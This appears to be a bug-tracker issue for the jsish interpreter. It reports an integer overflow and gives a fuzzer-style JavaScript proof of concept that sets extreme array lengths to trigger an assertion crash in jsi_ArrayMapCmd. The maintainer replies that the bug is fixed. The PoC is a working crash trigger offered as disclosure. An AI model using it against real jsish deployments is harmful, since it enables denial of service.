integer overflow

[bird8693]

Enviroment

operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1 

poc:

var o = [
    1,
    2
];
o = o.splice(o.length, o.length, o, o, o.length, 1.7976931348623157e+308);
o = o.toString(o.length);
var a = Object.keys(o);
var YzNz = new RegExp('kf}(Vq)XW8St');
o.length = -o.length;
o.length = 5e-324 >= 9007199254740992;
o.length = o == 1.3;
a.length = -9007199254740990;
o.length = a.length > o;
var FpXa = new RegExp('\fÇ\xAF\x8F\x93A\xAFuQ=ºC\x99e\xACCýæÜ47\x18');
var APSB = -9007199254740990 != a.length;
APSB = a.slice(a.length, a.length);
var ZDnB = a.map(function () {
}, function () {
});

The vulnerability code is in line src / jsiArray.c + 414, the function jsi_ArrayMapCmd, the vulnerability code is as follows:

The curlen here is also the size of the array, and can be arbitrarily set in the js code, for example in the poc

The affected code is in the analytic function Jsi_ObjSetLength, as shown in the figure:

The actual array size len is larger than obj-> arrMaxSize, which triggers the assert.

[pcmacdon]

This was a general problem with Array using .length when it shouldn't. Should be fixed.